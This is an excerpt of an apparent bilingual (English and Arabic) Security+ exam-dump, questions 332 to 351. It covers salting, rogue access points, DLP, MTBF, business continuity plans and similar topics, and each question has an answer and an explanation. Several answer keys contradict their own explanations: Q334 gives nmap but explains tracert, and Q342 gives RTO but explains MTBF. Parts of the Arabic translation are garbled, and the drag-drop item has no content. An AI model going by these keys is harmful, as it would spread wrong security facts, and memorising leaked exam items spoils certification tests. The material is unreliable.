‫ هذا يعني أن المسؤول‬.‫التأكد من أن جميع الخوادم السحابية سيكون لديها برنامج مثبت مسبقا لتسهيل فحص الثغرات الأمنية والمراقبة المستمرة‬
‫ يمكن أن يساعد‬.‫يحتاج إلى تزويد الخوادم السحابية بالبرامج والتكوين الضروريين قبل نشرها أو استخدامها من قبل العملاء أو المستخدمين النهائيين‬
.‫التوفير في أتمتة وتوحيد عملية إعداد الخوادم السحابية وتقليل مخاطر الأخطاء البشرية أو التناقضات‬
179 / 198
The safer , easier way to help you pass any IT exams.
332.A company recently upgraded its authentication infrastructure and now has more computing power.
Which of the following should the company consider using to ensure user credentials are being
transmitted and stored more securely?
A. Blockchain
B. Salting
C. Quantum
D. Digital signature
Answer: B
Explanation:
Salting is a technique that adds random data to user credentials before hashing them. This makes the
hashed credentials more secure and resistant to brute-force attacks or rainbow table attacks. Salting
also ensures that two users with the same password will have different hashed credentials.
A company that has more computing power can consider using salting to ensure user credentials are
being transmitted and stored more securely. Salting can increase the complexity and entropy of the
hashed credentials, making them harder to crack or reverse.
‫ أي مما يلي يجب أن تفكر الشركة في‬.‫ قامت إحدى الشركات مؤخرا بتحديث هياكلها الأساسية للمصادقة ولديها الآن قوة حوسبة أكبر‬-332
‫استخدامه لضمان نقل بيانات اعتماد المستخدم وتخزينها بشكل أكثر أمانا؟ التلميح‬
‫ هذا يجعل بيانات الاعتماد المجزأة أكثر أمانا ومقاومة‬.‫ التمليح هو أسلوب يضيف بيانات عشوائية إلى بيانات اعتماد المستخدم قبل تجزئتها‬:‫تفسير‬
‫ يضمن التمليح أيضا أن اثنين من المستخدمين الذين لديهم نفس كلمة المرور سيكون لديهم‬.‫لهجمات القوة الغاشمة أو هجمات جدول قوس قزح‬
‫ يمكن للشركة التي لديها المزيد من قوة الحوسبة التفكير في استخدام التمليح لضمان نقل بيانات اعتماد المستخدم‬.‫بيانات اعتماد مجزأة مختلفة‬
.‫ مما يجعل من الصعب كسرها أو عكسها‬، ‫ يمكن أن يؤدي التمليح إلى زيادة تعقيد وإنتروبيا بيانات الاعتماد المجزأة‬.‫وتخزينها بشكل أكثر أمانا‬
333.A corporate security team needs to secure the wireless perimeter of its physical facilities to ensure
only authorized users can access corporate resources.
Which of the following should the security team do? (Refer the answer from CompTIA SY0-601 Security+
documents or guide at comptia.org)
A. Identify rogue access points.
B. Check for channel overlaps.
C. Create heat maps.
D. Implement domain hijacking.
Answer: A
Explanation:
Based on CompTIA SY0-601 Security+ guide, the answer to the question is A. Identify rogue access
points.
To secure the wireless perimeter of its physical facilities, the corporate security team should focus on
identifying rogue access points, which are unauthorized access points that have been set up by
employees or outsiders to bypass security controls. By identifying and removing these rogue access
points, the team can ensure that only authorized users can access corporate resources through the
wireless network.
‫ ويحتاج فريق أمن الشركات إلى تأمين المحيط اللاسلكي لمرافقه المادية لضمان أن يتمكن المستعملون المصرح لهم‬-333
601-SY0 CompTIA ‫ أي مما يلي يجب أن يفعله فريق الأمن؟ (راجع الإجابة من مستندات‬.‫فقط من الوصول إلى موارد الشركة‬
.‫) ؟ تحديد نقاط الوصول المارقة‬comptia.org ‫ أو الدليل على‬+ Security
‫ لتأمين‬.‫ تحديد نقاط الوصول المارقة‬.‫ فإن إجابة السؤال هي أ‬، + Security 601-SY0 CompTIA ‫ استنادا إلى دليل‬:‫تفسير‬
‫ وهي نقاط وصول‬، ‫ يجب أن يركز فريق أمن الشركة على تحديد نقاط الوصول المارقة‬، ‫المحيط اللاسلكي لمنشآتها المادية‬
‫ من خلال تحديد نقاط الوصول المارقة هذه‬.‫غير مصرح بها تم إنشاؤها من قبل الموظفين أو الغرباء لتجاوز الضوابط الأمنية‬
‫ يمكن للفريق التأكد من أن المستخدمين المصرح لهم فقط يمكنهم الوصول إلى موارد الشركة من خلال الشبكة‬، ‫وإزالتها‬
.‫اللاسلكية‬
180 / 198
The safer , easier way to help you pass any IT exams.
334.Users report access to an application from an internal workstation is still unavailable to a specific
server, even after a recent firewall rule implementation that was requested for this access. ICMP traffic is
successful between the two devices. Which of the following tools should the security analyst use to help
identify if the traffic is being blocked?
A. nmap
B. tracert
C. ping
D. ssh
Answer: A
Explanation:
Tracert is a command-line tool that shows the route that packets take to reach a destination on a
network1. It also displays the time it takes for each hop along the way1. By using tracert, you can see if
there is a router or firewall that is blocking or slowing down the traffic between the internal workstation
and the specific server1.
‫ حتى بعد تنفيذ قاعدة‬،‫أبلغ المستخدمون عن أن الوصول إلى تطبيق من محطة عمل داخلية لا يزال غير متاح لخادم معين‬.334
‫ أي من الأدوات التالية يجب أن يستخدمها محلل‬.‫ ناجحة بين الجهازين‬ICMP ‫ حركة مرور‬.‫جدار الحماية مؤخرا لهذا الوصول‬
‫الأمان للمساعدة في تحديد ما إذا كان يتم حظر حركة المرور؟ نماب‬
‫ كما يعرض الوقت‬.1 ‫ هي أداة سطر أوامر تعرض المسار الذي تسلكه الحزم للوصول إلى وجهة على الشبكة‬Tracert :‫تفسير‬
‫ يمكنك معرفة ما إذا كان هناك جهاز توجيه أو جدار حماية يحظر‬، tracert ‫ باستخدام‬.1‫المستغرق لكل قفزة على طول الطريق‬
.1 ‫أو يبطئ حركة المرور بين محطة العمل الداخلية والخادم المحدد‬
335.A cybersecurity analyst at Company A is working to establish a secure communication channel with
a counter part at Company B, which is 3,000 miles (4.828 kilometers) away.
Which of the following concepts would help the analyst meet this goal m a secure manner?
A. Digital signatures
B. Key exchange
C. Salting
D. PPTP
Answer: B
Explanation:
Key exchange is the process of securely sharing cryptographic keys between two parties over a public
network. This allows them to establish a secure communication channel and encrypt their messages.
There are different methods of key exchange, such as Diffie-Hellman or RSA.
3000 ‫ التي تبعد‬،‫ ويعمل محلل للأمن السيبراني في الشركة ألف على إنشاء قناة اتصال آمنة مع نظير لها في الشركة باء‬-335
‫ أي من المفاهيم التالية سيساعد المحلل على تحقيق هذا الهدف بطريقة آمنة؟ تبادل المفاتيح‬.)‫ كيلومترا‬4828( ‫ميل‬
‫ هذا يسمح لهم بإنشاء قناة‬.‫ تبادل المفاتيح هو عملية مشاركة مفاتيح التشفير بشكل آمن بين طرفين عبر شبكة عامة‬:‫تفسير‬
.RSA ‫ أو‬Hellman-Diffie ‫ مثل‬، ‫ هناك طرق مختلفة لتبادل المفاتيح‬.‫اتصال آمنة وتشفير رسائلهم‬
181 / 198
The safer , easier way to help you pass any IT exams.
336.A company was recently breached Pan of the company's new cybersecurity strategy is to centralize?
the togs horn all security devices.
Which of the following components forwards the logs to a central source?
A. Log enrichment
B. Log queue
C. Log parser
D. Log collector
Answer: D
Explanation:
A log collector is a component that forwards the logs from all security devices to a central source. A log
collector can be a software tool or a hardware appliance that collects logs from various sources, such as
firewalls, routers, servers, applications, or endpoints. A log collector can also perform functions such as
log filtering, parsing, aggregation, normalization, and enrichment. A log collector can help centralize
logging by sending the collected logs to a central log server or a security information and event
management (SIEM) system for further analysis and correlation.
‫ جميع الأجهزة‬TOGS ‫ شركة تم اختراقها مؤخرا عموم استراتيجية الشركة الجديدة للأمن السيبراني هو المركزية؟ بوق‬A.336
‫ أي من المكونات التالية يعيد توجيه السجلات إلى مصدر مركزي؟ جامع السجل‬.‫الأمنية‬
‫ يمكن أن يكون جامع‬.‫ جامع السجلات هو مكون يقوم بإعادة توجيه السجلات من جميع أجهزة الأمان إلى مصدر مركزي‬:‫التفسير‬
‫ مثل جدران الحماية أو أجهزة التوجيه أو الخوادم أو‬، ‫السجلات أداة برمجية أو جهازا يجمع السجلات من مصادر مختلفة‬
.‫ يمكن لمجمع السجل أيضا أداء وظائف مثل تصفية السجل والتحليل والتجميع والتطبيع والإثراء‬.‫التطبيقات أو نقاط النهاية‬
‫يمكن أن يساعد جامع السجلات في مركزية التسجيل عن طريق إرسال السجلات المجمعة إلى خادم سجل مركزي أو نظام إدارة‬
.‫) لمزيد من التحليل والارتباط‬SIEM( ‫معلومات الأمان والأحداث‬
337.An attacker is using a method to hide data inside of benign files in order to exfiltrate confidential
data. Which of the following is the attacker most likely using?
A. Base64 encoding
B. Steganography
C. Data encryption
D. Perfect forward secrecy
Answer: B
Explanation:
Steganography is a technique for hiding data inside of benign files such as images, audio, or video. This
can be used to exfiltrate confidential data without raising suspicion or detection.
References: How to Hide Files Inside Files [Images, Folder] - Raymond.CC Blog; How to Hide Data in a
Secret Text File Compartment - How-To Geek; How to Hide Data Within an Image - Medium
‫ أي مما يلي‬.‫ويستخدم أحد المهاجمين طريقة لإخفاء البيانات داخل ملفات حميدة من أجل استخراج بيانات سرية‬-337
‫يستخدمه المهاجم على الأرجح؟ إخفاء المعلومات‬
‫ يمكن استخدام هذا‬.‫ إخفاء المعلومات هو تقنية لإخفاء البيانات داخل الملفات الحميدة مثل الصور أو الصوت أو الفيديو‬:‫تفسير‬
‫ مدونة‬- ]‫ المجلد‬، ‫ كيفية إخفاء الملفات داخل الملفات [الصور‬:‫ المراجع‬.‫لاستخراج البيانات السرية دون إثارة الشكوك أو الكشف‬
‫ متوسطة‬- ‫ كيف المهوس ؛ كيفية إخفاء البيانات داخل صورة‬- ‫؛ كيفية إخفاء البيانات في حجرة ملف نصي سري‬
182 / 198
The safer , easier way to help you pass any IT exams.
338.A network manager is concerned that business may be negatively impacted if the firewall in its data
center goes offline. The manager would like to implement a high availability pair to:
A. decrease the mean time between failures.
B. remove the single point of failure.
C. cut down the mean time to repair
D. reduce the recovery time objective
Answer: B
Explanation:
A single point of failure is a component or element of a system that, if it fails, will cause the entire system
to fail or stop functioning. It can pose a high risk and impact for business continuity and availability. A
high availability pair is a configuration that involves two identical devices or systems that operate in
parallel and provide redundancy and failover capabilities. It can remove the single point of failure by
ensuring that if one device or system fails, the other one can take over its functions without interruption
or downtime.
‫ و يساور أحد مديري الشبكات القلق من أن الأعمال التجارية قد تتأثر سلبا إذا توقف جدار الحماية في مركز البيانات‬-338
.‫ إزالة نقطة الفشل الواحدة‬:‫ يرغب المدير في تنفيذ زوج عالي التوافر من أجل‬.‫الخاص به عن العمل‬
.‫ سيؤدي إلى فشل النظام بأكمله أو توقفه عن العمل‬، ‫ إذا فشل‬، ‫ نقطة فشل واحدة هي مكون أو عنصر من النظام‬:‫تفسير‬
‫ زوج التوفر العالي هو تكوين يتضمن جهازين أو نظامين‬.‫يمكن أن يشكل خطرا كبيرا وتأثيرا على استمرارية الأعمال وتوافرها‬
‫ يمكنه إزالة نقطة الفشل الفردية من خلال التأكد من أنه في‬.‫متطابقين يعملان بالتوازي ويوفران إمكانات التكرار وتجاوز الفشل‬
.‫ يمكن للجهاز الآخر تولي وظائفه دون انقطاع أو توقف‬، ‫حالة فشل أحد الأجهزة أو الأنظمة‬
339.An attacker is targeting a company. The attacker notices that the company’s employees frequently
access a particular website. The attacker decides to infect the website with malware and hopes the
employees’ devices will also become infected. Which of the following techniques is the attacker using?
A. Watering-hole attack
B. Pretexting
C. Typosquatting
D. Impersonation
Answer: A
Explanation:
a watering hole attack is a form of cyberattack that targets a specific group of users by infecting websites
that they commonly visit123. The attacker seeks to compromise the user’s computer and gain access to
the network at the user’s workplace or personal data123. The attacker observes the websites often
visited by the victim or the group and infects those sites with malware14 . The attacker may also lure the
user to a malicious site 4. A watering hole attack is difficult to diagnose and poses a significant threat to
websites and users2 .
‫ يقرر المهاجم‬.‫ يلاحظ المهاجم أن موظفي الشركة يصلون بشكل متكرر إلى موقع ويب معين‬.‫مهاجم يستهدف شركة‬-339
‫ أي من التقنيات التالية يستخدمها المهاجم؟‬.‫إصابة موقع الويب ببرامج ضارة ويأمل أن تصاب أجهزة الموظفين أيضا‬
‫هجوم حفرة الري‬
‫ هجوم حفرة الري هو شكل من أشكال الهجوم الإلكتروني الذي يستهدف مجموعة معينة من المستخدمين عن طريق‬:‫تفسير‬
‫ يسعى المهاجم إلى اختراق جهاز الكمبيوتر الخاص بالمستخدم والوصول‬.123‫إصابة مواقع الويب التي يزورونها بشكل شائع‬
‫ يراقب المهاجم مواقع الويب التي غالبا ما يزورها الضحية أو‬.123‫إلى الشبكة في مكان عمل المستخدم أو بياناته الشخصية‬
‫ يصعب‬.4 ‫ قد يقوم المهاجم أيضا بجذب المستخدم إلى موقع ضار‬. 14‫المجموعة ويصيب تلك المواقع بالبرامج الضارة‬
. 2‫تشخيص هجوم حفرة الري ويشكل تهديدا كبيرا لمواقع الويب والمستخدمين‬
183 / 198
The safer , easier way to help you pass any IT exams.
340.A global pandemic is forcing a private organization to close some business units and reduce staffing
at others. Which of the following would be best to help the organization's executives determine their
next course ofaction?
A. An incident response plan
B. A communication plan
C. A disaster recovery plan
D. A business continuity plan
Answer: D
Explanation:
A business continuity plan (BCP) is a document that outlines how an organization will continue its critical
functions during and after a disruptive event, such as a natural disaster, pandemic, cyberattack, or power
outage. A BCP typically covers topics such as business impact analysis, risk assessment, recovery
strategies, roles and responsibilities, communication plan, testing and training, and maintenance and
review. A BCP can help the organization’s executives determine their next course of action by providing
them with a clear framework and guidance for managing the crisis and resuming normal operations.
‫ أي مما يلي‬.‫ يجبر وباء عالمي منظمة خاصة على إغلاق بعض وحدات الأعمال وخفض عدد الموظفين في وحدات أخرى‬-340
‫سيكون أفضل لمساعدة المديرين التنفيذيين للمنظمة على تحديد مسار عملهم التالي؟ خطة استمرارية الأعمال‬
، ‫) هي وثيقة تحدد كيف ستواصل المؤسسة وظائفها الحيوية أثناء وبعد حدث تخريبي‬BCP( ‫ خطة استمرارية الأعمال‬:‫تفسير‬
‫ عادة موضوعات مثل تحليل تأثير‬BCP ‫ يغطي‬.‫مثل كارثة طبيعية أو جائحة أو هجوم إلكتروني أو انقطاع التيار الكهربائي‬
‫ والصيانة‬، ‫ والاختبار والتدريب‬، ‫ وخطة الاتصال‬، ‫ والأدوار والمسؤوليات‬، ‫ واستراتيجيات الاسترداد‬، ‫ وتقييم المخاطر‬، ‫الأعمال‬
‫ المديرين التنفيذيين للمؤسسة على تحديد مسار عملهم التالي من خلال تزويدهم بإطار عمل‬BCP ‫ يمكن أن يساعد‬.‫والمراجعة‬
.‫واضح وإرشادات لإدارة الأزمة واستئناف العمليات العادية‬
341. While researching a data exfiltration event, the security team discovers that a large amount of data
was transferred to a file storage site on the internet.
Which of the following controls would work best to reduce the risk of further exfiltration using this
method?
A. Data loss prevention
B. Blocking IP traffic at the firewall
C. Containerization
D. File integrity monitoring
Answer: A
Explanation:
Data loss prevention (DLP) is a set of tools and processes that aim to prevent unauthorized access, use,
or transfer of sensitive data. DLP can help reduce the risk of further exfiltration using file storage sites on
the internet by monitoring and controlling data flows across endpoints, networks, and cloud services.
DLP can also detect and block attempts to copy, upload, or download sensitive data to or from file
storage sites based on predefined policies and rules.
‫ يكتشف فريق الأمان أنه تم نقل كمية كبيرة من البيانات إلى موقع تخزين الملفات‬، ‫أثناء البحث عن حدث استخراج البيانات‬
‫ أي من عناصر التحكم الآتية يعمل بشكل أفضل لتقليل مخاطر المزيد من الاستخراج باستخدام هذه الطريقة؟‬.‫على الإنترنت‬
‫منع فقدان البيانات‬
‫) هو مجموعة من الأدوات والعمليات التي تهدف إلى منع الوصول غير المصرح به إلى‬DLP( ‫ منع فقدان البيانات‬:‫تفسير‬
‫ في تقليل مخاطر المزيد من الاستخراج باستخدام مواقع تخزين‬DLP ‫ يمكن أن تساعد‬.‫البيانات الحساسة أو استخدامها أو نقلها‬
‫ يمكن‬.‫الملفات على الإنترنت من خلال مراقبة تدفقات البيانات والتحكم فيها عبر نقاط النهاية والشبكات والخدمات السحابية‬
‫لميزة منع فقدان البيانات أيضا اكتشاف ومنع محاولات نسخ البيانات الحساسة أو تحميلها أو تنزيلها من مواقع تخزين الملفات‬
.‫أو منها استنادا إلى سياسات وقواعد محددة مسبقا‬
184 / 198
The safer , easier way to help you pass any IT exams.
342. Which of the following measures the average time that equipment will operate before it breaks?
A. SLE
B. MTBF
C. RTO
D. ARO
Answer: C
Explanation:
the measure that calculates the average time that equipment will operate before it breaks is MTBF12.
MTBF stands for Mean Time Between Failures and it is a metric that represents the average time
between two failures occurring in a given period12. MTBF is used to measure the reliability and
availability of a product or system12. The higher the MTBF, the more reliable and available the product or
system is12.
‫أي من الآتي يقيس متوسط الوقت الذي ستعمل فيه المعدات قبل أن تتعطل؟ ترو‬
‫ إلى متوسط‬MTBF ‫ يرمز‬.MTBF12 ‫ المقياس الذي يحسب متوسط الوقت الذي ستعمل فيه المعدات قبل أن تنكسر هو‬:‫تفسير‬
‫ لقياس‬MTBF ‫ يستخدم‬.12 ‫الوقت بين حالات الفشل وهو مقياس يمثل متوسط الوقت بين فشلين يحدثان في فترة معينة‬
.12‫ كان المنتج أو النظام أكثر موثوقية ومتاحا‬، MTBF ‫ كلما ارتفع‬.12‫موثوقية وتوافر منتج أو نظام‬
343. Physical access to the organization's servers in the data center requires entry and exit through
multiple access points: a lobby, an access control vestibule, three doors leading to the server floor itself
and eventually to a caged area solely for the organization's hardware.
Which of the following controls is described in this scenario?
A. Compensating
B. Deterrent
C. Preventive
D. Detective
Answer: C
Explanation:
The scenario describes preventive controls, which are designed to stop malicious actors from gaining
access to the organization's servers. This includes using multiple access points, such as a lobby, an
access control vestibule, and multiple doors leading to the server floor, as well as caging the
organization's hardware. According to the CompTIA Security+ SY0-601 document, preventive controls
are "designed to stop malicious actors from performing a malicious activity or gaining access to an
asset." These controls can include technical solutions, such as authentication and access control
systems, physical security solutions, such as locks and barriers, and administrative solutions such as
policy enforcement.
‫ دهليز‬، ‫ ردهة‬:‫يتطلب الوصول المادي إلى خوادم المؤسسة في مركز البيانات الدخول والخروج من خلال نقاط وصول متعددة‬
‫ أي من‬.‫ ثلاثة أبواب تؤدي إلى أرضية الخادم نفسها وفي النهاية إلى منطقة قفص فقط لأجهزة المنظمة‬، ‫للتحكم في الوصول‬
‫عناصر التحكم التالية موصوفة في هذا السيناريو؟ الوقائيه‬
‫ والتي تم تصميمها لمنع الجهات الفاعلة الضارة من الوصول إلى خوادم‬،‫ يصف السيناريو عناصر التحكم الوقائية‬:‫تفسير‬
‫ والأبواب المتعددة‬، ‫ ودهليز التحكم في الوصول‬، ‫ مثل الردهة‬، ‫ يتضمن ذلك استخدام نقاط وصول متعددة‬.‫المؤسسة‬
‫ فإن‬، 601-SY0 + Security CompTIA ‫ وفقا لوثيقة‬.‫ بالإضافة إلى وضع أجهزة المؤسسة في قفص‬، ‫المؤدية إلى أرضية الخادم‬
‫ يمكن أن تشمل‬."‫الضوابط الوقائية "مصممة لمنع الجهات الفاعلة الضارة من أداء نشاط ضار أو الوصول إلى أحد الأصول‬
، ‫ مثل الأقفال والحواجز‬، ‫ وحلول الأمان المادي‬، ‫ مثل أنظمة المصادقة والتحكم في الوصول‬، ‫عناصر التحكم هذه حلولا تقنية‬
.‫والحلول الإدارية مثل إنفاذ السياسة‬
185 / 198
The safer , easier way to help you pass any IT exams.
344. DRAG DROP
An attack has occurred against a company.
INSTRUCTIONS
You have been tasked to do the following:
Identify the type of attack that is occurring on the network by clicking on the attacker’s tablet and
reviewing the output. (Answer Area 1).
Identify which compensating controls should be implemented on the assets, in order to reduce the
effectiveness of future attacks by dragging them to the correct server.
(Answer area 2) All objects will be used, but not all placeholders may be filled. Objects may only be used
once.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All
button.
‫سحب الإسقاط‬
.‫وقع هجوم ضد شركة‬
‫تعليمات‬
:‫لقد تم تكليفك بالقيام بما يلي‬
.)1 ‫ (منطقة الإجابة‬.‫حدد نوع الهجوم الذي يحدث على الشبكة من خلال النقر على الجهاز اللوحي للمهاجم ومراجعة الإخراج‬
‫ من أجل تقليل فعالية الهجمات المستقبلية عن طريق سحبها إلى‬، ‫حدد الضوابط التعويضية التي يجب تنفيذها على الأصول‬
‫ يمكن استخدام‬.‫ ولكن قد لا يتم تعبئة جميع العناصر النائبة‬،‫) سيتم استخدام جميع الكائنات‬2 ‫ (مجال الإجابة‬.‫الخادم الصحيح‬
.‫الكائنات مرة واحدة فقط‬
.‫ فالرجاء النقر فوق إعادة تعيين الكل زر‬، ‫إذا كنت ترغب في أي وقت في إعادة الحالة الأولية للمحاكاة‬
186 / 198
The safer , easier way to help you pass any IT exams.
187 / 198
The safer , easier way to help you pass any IT exams.
Answer:
188 / 198
The safer , easier way to help you pass any IT exams.
Explanation:
A computer screen shot of a computer
Description automatically generated with low confidence
‫لقطة شاشة كمبيوتر لجهاز كمبيوتر‬
‫الوصف الذي يتم إنشاؤه تلقائيا بثقة منخفضة‬
189 / 198
The safer , easier way to help you pass any IT exams.
345. Two organizations are discussing a possible merger Both Organizations Chief Fi-nancial Officers
would like to safely share payroll data with each Other to de-termine if the pay scales for different roles
are similar at both organizations.
Which Of the following techniques would be best to protect employee data while allowing the companies
to successfully share this information?
A. Pseudo-anonymization
B. Tokenization
C. Data masking
D. Encryption
Answer: A
Explanation:
Pseudo-anonymization is a technique of replacing sensitive data with artificial identifiers or pseudonyms
that preserve some characteristics or attributes of the original data. It can protect employee data while
allowing the companies to successfully share this information by removing direct identifiers such as
names, addresses, etc., but retaining indirect identifiers such as job roles, pay scales, etc., that are
relevant for the comparison.
‫منظمتان تناقشان اندماجا محتملا يرغب كبار المسؤولين الماليين في كلتا المنظمتين في مشاركة بيانات كشوف المرتبات‬
‫ أي من‬.‫بأمان مع بعضهما البعض لإلغاء تحديدها إذا كانت جداول الأجور للأدوار المختلفة متشابهة في كلتا المؤسستين‬
‫التقنيات التالية سيكون الأفضل لحماية بيانات الموظفين مع السماح للشركات بمشاركة هذه المعلومات بنجاح؟‬
‫إخفاء الهوية الزائفة‬
‫ إخفاء الهوية الزائفة هو تقنية لاستبدال البيانات الحساسة بمعرفات اصطناعية أو أسماء مستعارة تحافظ على بعض‬:‫تفسير‬
‫ يمكنه حماية بيانات الموظفين مع السماح للشركات بمشاركة هذه المعلومات بنجاح عن‬.‫خصائص أو سمات البيانات الأصلية‬
‫ مع الاحتفاظ بالمعرفات غير المباشرة مثل الأدوار‬، ‫طريق إزالة المعرفات المباشرة مثل الأسماء والعناوين وما إلى ذلك‬
.‫ ذات الصلة بالمقارنة‬، ‫الوظيفية وجداول الأجور وما إلى ذلك‬
346.A company wants the ability to restrict web access and monitor the websites that employees visit.
Which Of the following would best meet these requirements?
A. Internet Proxy
B. VPN
C. WAF
D. Firewall
Answer: A
Explanation:
An internet proxy is a server that acts as an intermediary between a client and a destination server on
the internet. It can restrict web access and monitor the websites that employees visit by filtering the
requests and responses based on predefined rules and policies, and logging the traffic and activities for
auditing purposes
‫ أي مما يلي يلبي هذه‬.‫ تريد شركة القدرة على تقييد الوصول إلى الويب ومراقبة مواقع الويب التي يزورها الموظفون‬-346
‫المتطلبات على أفضل وجه؟ وكيل الإنترنت‬
‫ يمكنه تقييد الوصول إلى الويب‬.‫ وكيل الإنترنت هو خادم يعمل كوسيط بين العميل والخادم الوجهة على الإنترنت‬:‫تفسير‬
‫ومراقبة مواقع الويب التي يزورها الموظفون عن طريق تصفية الطلبات والاستجابات بناء على قواعد وسياسات محددة‬
‫ وتسجيل حركة المرور والأنشطة لأغراض التدقيق‬، ‫مسبقا‬
190 / 198
The safer , easier way to help you pass any IT exams.
347.A security team is conducting a security review of a hosted data provider. The management team
has asked the hosted data provider to share proof that customer data is being appropriately protected.
Which of the following would provide the best proof that customer data is being protected?
A. SOC2
B. CSA
C. CSF
D. 1SO 31000
Answer: A
Explanation:
SOC2 is a type of audit report that provides assurance on the security, availability, processing integrity,
confidentiality, and privacy of a service organization’s systems. It is based on the Trust Services Criteria
developed by the American Institute of Certified Public Accountants (AICPA). A SOC2 report can provide
proof that customer data is being appropriately protected by the hosted data provider1
‫ طلب فريق الإدارة من مزود البيانات المستضاف مشاركة‬.‫ و يجري فريق أمني استعراضا أمنيا لمقدم بيانات مستضاف‬-347
‫ أي مما يلي سيوفر أفضل دليل على حماية بيانات العميل؟ سوك‬.‫دليل على أن بيانات العميل محمية بشكل مناسب‬
‫ هو نوع من تقارير التدقيق التي توفر ضمانا بشأن أمان أنظمة مؤسسة الخدمة وتوافرها وسلامتها وسريتها‬SOC2 :‫تفسير‬
‫ يمكن‬.)AICPA( ‫ يعتمد على معايير خدمات الثقة التي طورها المعهد الأمريكي للمحاسبين القانونيين المعتمدين‬.‫وخصوصيتها‬
1‫ دليلا على أن بيانات العميل محمية بشكل مناسب من قبل موفر البيانات المستضاف‬SOC2 ‫أن يوفر تقرير‬
348. An employee used a corporate mobile device during a vacation Multiple contacts were modified in
the device vacation.
Which of the following method did attacker to insert the contacts without having 'Physical access to
device?
A. Jamming
B. BluJacking
C. Disassoaatm
D. Evil twin
Answer: B
Explanation:
bluejacking is the sending of unsolicited messages over Bluetooth to Bluetooth-enabled devices such as
mobile phones, PDAs or laptop computers. Bluejacking does not involve device hijacking, despite what
the name implies. In this context, a human might say that the best answer to the question is B.
BluJacking, because it is a method that can insert contacts without having physical access to the device.
‫ أي من الطرق التالية قام‬.‫استخدم موظف جهازا محمولا للشركة أثناء إجازة تم تعديل جهات اتصال متعددة في إجازة الجهاز‬
‫المهاجم بإدخال جهات الاتصال دون أن يكون لديه "وصول مادي إلى الجهاز؟بلوجاكينق‬
‫ مثل الهواتف‬Bluetooth ‫ هو إرسال رسائل غير مرغوب فيها عبر البلوتوث إلى الأجهزة التي تدعم تقنية‬Bluejacking :‫تفسير‬
‫ على‬، ‫ على اختطاف الجهاز‬Bluejacking ‫ لا ينطوي‬.‫المحمولة أو أجهزة المساعد الرقمي الشخصي أو أجهزة الكمبيوتر المحمولة‬
‫ لأنها طريقة‬، BluJacking .B ‫ قد يقول الإنسان أن أفضل إجابة على السؤال هي‬، ‫ في هذا السياق‬.‫الرغم مما يوحي به الاسم‬
.‫يمكنها إدراج جهات اتصال دون الوصول الفعلي إلى الجهاز‬
191 / 198
The safer , easier way to help you pass any IT exams.
349. Security analysts have noticed the network becomes flooded with malicious packets at
specific times of the day. Which of the following should the analysts use to investigate this
issue?
A. Web metadata
B. Bandwidth monitors
C. System files
D. Correlation dashboards
Answer: D
Explanation:
Correlation dashboards are tools that allow security analysts to monitor and analyze multiple sources of
data and events in real time. They can help identify patterns, trends, anomalies, and threats by
correlating different types of data and events, such as network traffic, logs, alerts, and incidents.
Correlation dashboards can help investigate network flooding by showing the source, destination,
volume, and type of malicious packets and their impact on the network performance and availability.
‫ أي مما يلي يجب أن يستخدمه المحللون‬.‫لاحظ محللو الأمن أن الشبكة تغمر الحزم الضارة في أوقات محددة من اليوم‬
‫للتحقيق في هذه المشكلة؟ لوحات معلومات الارتباط‬
‫ لوحات معلومات الارتباط هي أدوات تسمح لمحللي الأمان بمراقبة وتحليل مصادر متعددة للبيانات والأحداث في‬:‫تفسير‬
‫ يمكنهم المساعدة في تحديد الأنماط والاتجاهات والحالات الشاذة والتهديدات من خلال ربط أنواع مختلفة من‬.‫الوقت الفعلي‬
‫ يمكن أن تساعد لوحات معلومات الارتباط في‬.‫ مثل حركة مرور الشبكة والسجلات والتنبيهات والحوادث‬، ‫البيانات والأحداث‬
.‫التحقيق في إغراق الشبكة من خلال إظهار مصدر الحزم الضارة ووجهتها وحجمها ونوعها وتأثيرها على أداء الشبكة وتوفرها‬
350. Which of the following would be best to ensure data is saved to a location on a server, is easily
scaled, and is centrally monitored?
A. Edge computing
B. Microservices
C. Containers
D. Thin client
Answer: C
Explanation:
Containers are a method of virtualization that allow you to run multiple isolated applications on a single
server. Containers are lightweight, portable, and scalable, which means they can save resources,
improve performance, and simplify deployment. Containers also enable centralized monitoring and
management of the applications running on them, using tools such as Docker or Kubernetes. Containers
are different from edge computing, which is a distributed computing paradigm that brings computation
and data storage closer to the location where it is needed. Microservices are a software architecture
style that breaks down complex applications into smaller, independent services that communicate with
each other. Thin clients are devices that rely on a server to perform most of the processing tasks and
only provide a user interface.
‫ ومراقبتها مركزيا؟ حاويات‬، ‫ وتحجيمها بسهولة‬، ‫أي مما يلي سيكون أفضل لضمان حفظ البيانات في موقع على الخادم‬
‫ الحاويات‬.‫ الحاويات هي طريقة للمحاكاة الافتراضية تسمح لك بتشغيل تطبيقات معزولة متعددة على خادم واحد‬:‫تفسير‬
‫ تتيح الحاويات أيضا‬.‫ مما يعني أنه يمكنها توفير الموارد وتحسين الأداء وتبسيط النشر‬، ‫خفيفة الوزن ومحمولة وقابلة للتطوير‬
‫ تختلف الحاويات عن‬.Kubernetes ‫ أو‬Docker ‫ باستخدام أدوات مثل‬، ‫المراقبة المركزية وإدارة التطبيقات التي تعمل عليها‬
‫ الخدمات‬.‫ وهي نموذج حوسبة موزع يجعل الحساب وتخزين البيانات أقرب إلى الموقع الذي تحتاج إليه‬، ‫حوسبة الحافة‬
‫ الأجهزة‬.‫المصغرة هي نمط بنية برمجية يقسم التطبيقات المعقدة إلى خدمات أصغر ومستقلة تتواصل مع بعضها البعض‬
.‫العميلة الرقيقة هي أجهزة تعتمد على خادم لأداء معظم مهام المعالجة وتوفر واجهة مستخدم فقط‬
192 / 198
The safer , easier way to help you pass any IT exams.
351. Which of the following will increase cryptographic security?
A. High data entropy
B. Algorithms that require less computing power
C. Longer key longevity
D. Hashing
Answer: A
Explanation:
Data entropy is a measure of the randomness or unpredictability of data. High data entropy means that
the data has more variation and less repetition, making it harder to guess or crack. It can increase
cryptographic security by making the encryption keys and ciphertext more complex and resistant to
brute-force attacks, frequency analysis, etc
‫أي مما يلي سيزيد من أمان التشفير؟ إنتروبيا بيانات عالية‬
‫ تعني إنتروبيا البيانات العالية أن البيانات‬.‫ إنتروبيا البيانات هي مقياس لعشوائية البيانات أو عدم القدرة على التنبؤ بها‬:‫تفسير‬
‫ يمكنه زيادة أمان التشفير عن طريق جعل مفاتيح التشفير‬.‫ مما يجعل من الصعب تخمينها أو كسرها‬، ‫بها تباين أكبر وتكرار أقل‬
